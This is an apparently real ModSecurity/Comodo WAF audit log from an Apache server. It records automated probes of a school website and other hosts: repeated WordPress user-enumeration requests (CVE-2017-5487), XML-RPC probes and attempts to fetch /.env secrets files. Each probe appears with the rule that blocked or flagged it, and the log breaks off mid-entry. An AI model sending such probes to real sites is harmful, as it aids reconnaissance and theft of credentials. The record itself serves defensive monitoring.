OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f85ae075-Z-- --198b8672-A-- [17/May/2025:09:38:50 +0700] aCf2uhKi5m5upc8uMd6imQAAANU 103.236.140.4 45746 103.236.140.4 8181 --198b8672-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --198b8672-C-- demo.sayHello --198b8672-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --198b8672-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449530466784 4438 (- - -) Stopwatch2: 1747449530466784 4438; combined=3508, p1=418, p2=2891, p3=23, p4=24, p5=89, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --198b8672-Z-- --9c088949-A-- [17/May/2025:09:39:14 +0700] aCf20um4kjNN-hEbWjJB1AAAAEs 103.236.140.4 45830 103.236.140.4 8181 --9c088949-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c088949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c088949-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449554975492 2493 (- - -) Stopwatch2: 1747449554975492 2493; combined=1199, p1=395, p2=776, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c088949-Z-- --f8195777-A-- [17/May/2025:09:39:20 +0700] aCf22HyxdQCiyU1ENFcorgAAABE 103.236.140.4 45882 103.236.140.4 8181 --f8195777-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8195777-C-- demo.sayHello --f8195777-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8195777-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449560848050 5048 (- - -) Stopwatch2: 1747449560848050 5048; combined=4143, p1=526, p2=3334, p3=32, p4=35, p5=122, sr=85, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8195777-Z-- --9e02f751-A-- [17/May/2025:09:39:38 +0700] aCf26hKi5m5upc8uMd6ipgAAANU 103.236.140.4 46002 103.236.140.4 8181 --9e02f751-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e02f751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e02f751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449578233059 2564 (- - -) Stopwatch2: 1747449578233059 2564; combined=1214, p1=423, p2=761, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e02f751-Z-- --7d55a36a-A-- [17/May/2025:09:39:43 +0700] aCf27xKi5m5upc8uMd6irgAAAMs 103.236.140.4 46036 103.236.140.4 8181 --7d55a36a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d55a36a-C-- demo.sayHello --7d55a36a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d55a36a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449583190406 5742 (- - -) Stopwatch2: 1747449583190406 5742; combined=4088, p1=514, p2=3399, p3=31, p4=35, p5=66, sr=63, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d55a36a-Z-- --61826c2f-A-- [17/May/2025:09:39:43 +0700] aCf27wTOsBn9MSWb6WJvJgAAAIk 103.236.140.4 46038 103.236.140.4 8181 --61826c2f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61826c2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61826c2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449583222480 1344 (- - -) Stopwatch2: 1747449583222480 1344; combined=653, p1=212, p2=425, p3=0, p4=0, p5=16, sr=43, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61826c2f-Z-- --48eecc02-A-- [17/May/2025:09:39:50 +0700] aCf29nyxdQCiyU1ENFcovQAAABM 103.236.140.4 46064 103.236.140.4 8181 --48eecc02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48eecc02-C-- demo.sayHello --48eecc02-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48eecc02-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449590781431 5223 (- - -) Stopwatch2: 1747449590781431 5223; combined=4254, p1=501, p2=3482, p3=30, p4=36, p5=117, sr=72, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48eecc02-Z-- --b4458509-A-- [17/May/2025:09:41:25 +0700] aCf3VXyxdQCiyU1ENFco8AAAABM 103.236.140.4 46652 103.236.140.4 8181 --b4458509-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4458509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4458509-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449685342204 2482 (- - -) Stopwatch2: 1747449685342204 2482; combined=1252, p1=404, p2=814, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4458509-Z-- --90730266-A-- [17/May/2025:09:41:31 +0700] aCf3W3yxdQCiyU1ENFco9AAAABc 103.236.140.4 46668 103.236.140.4 8181 --90730266-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.225 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --90730266-C-- demo.sayHello --90730266-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --90730266-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449691071409 4585 (- - -) Stopwatch2: 1747449691071409 4585; combined=3615, p1=436, p2=2909, p3=24, p4=25, p5=124, sr=68, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90730266-Z-- --a63d4601-A-- [17/May/2025:09:42:03 +0700] aCf3e3yxdQCiyU1ENFcpBgAAAAo 103.236.140.4 46848 103.236.140.4 8181 --a63d4601-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a63d4601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a63d4601-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449723193318 2784 (- - -) Stopwatch2: 1747449723193318 2784; combined=1229, p1=416, p2=783, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a63d4601-Z-- --42518136-A-- [17/May/2025:09:42:10 +0700] aCf3ghKi5m5upc8uMd6i6AAAANc 103.236.140.4 46880 103.236.140.4 8181 --42518136-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --42518136-C-- demo.sayHello --42518136-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --42518136-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449730581739 5202 (- - -) Stopwatch2: 1747449730581739 5202; combined=4078, p1=492, p2=3367, p3=29, p4=29, p5=94, sr=70, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42518136-Z-- --5c406e2a-A-- [17/May/2025:09:42:34 +0700] aCf3mum4kjNN-hEbWjJCDAAAAFM 103.236.140.4 47080 103.236.140.4 8181 --5c406e2a-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 142.93.0.66 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --5c406e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c406e2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747449754939557 766 (- - -) Stopwatch2: 1747449754939557 766; combined=298, p1=256, p2=0, p3=0, p4=0, p5=42, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c406e2a-Z-- --fc292079-A-- [17/May/2025:09:44:01 +0700] aCf38em4kjNN-hEbWjJCNAAAAFY 103.236.140.4 47666 103.236.140.4 8181 --fc292079-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc292079-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc292079-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449841884474 3429 (- - -) Stopwatch2: 1747449841884474 3429; combined=1480, p1=468, p2=975, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc292079-Z-- --97cd623b-A-- [17/May/2025:09:44:07 +0700] aCf39wTOsBn9MSWb6WJvnwAAAJg 103.236.140.4 47710 103.236.140.4 8181 --97cd623b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.208 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --97cd623b-C-- demo.sayHello --97cd623b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --97cd623b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449847654003 6175 (- - -) Stopwatch2: 1747449847654003 6175; combined=4528, p1=596, p2=3659, p3=33, p4=32, p5=117, sr=139, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97cd623b-Z-- --bae83473-A-- [17/May/2025:09:47:10 +0700] aCf4rum4kjNN-hEbWjJCfwAAAFU 103.236.140.4 48712 103.236.140.4 8181 --bae83473-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bae83473-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bae83473-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747450030516664 2769 (- - -) Stopwatch2: 1747450030516664 2769; combined=1292, p1=414, p2=849, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bae83473-Z-- --cda34815-A-- [17/May/2025:09:47:16 +0700] aCf4tBKi5m5upc8uMd6jTQAAANc 103.236.140.4 48756 103.236.140.4 8181 --cda34815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cda34815-C-- demo.sayHello --cda34815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda34815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747450036202661 5868 (- - -) Stopwatch2: 1747450036202661 5868; combined=4271, p1=539, p2=3485, p3=31, p4=35, p5=105, sr=71, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda34815-Z-- --45ac0210-A-- [17/May/2025:09:53:12 +0700] aCf6GATOsBn9MSWb6WJwAgAAAJQ 103.236.140.4 49786 103.236.140.4 8181 --45ac0210-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.81.24.74 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --45ac0210-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45ac0210-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747450392478935 829 (- - -) Stopwatch2: 1747450392478935 829; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45ac0210-Z-- --e78fab2c-A-- [17/May/2025:09:55:23 +0700] aCf6mxKi5m5upc8uMd6jYgAAAM4 103.236.140.4 50402 103.236.140.4 8181 --e78fab2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close User-Agent: 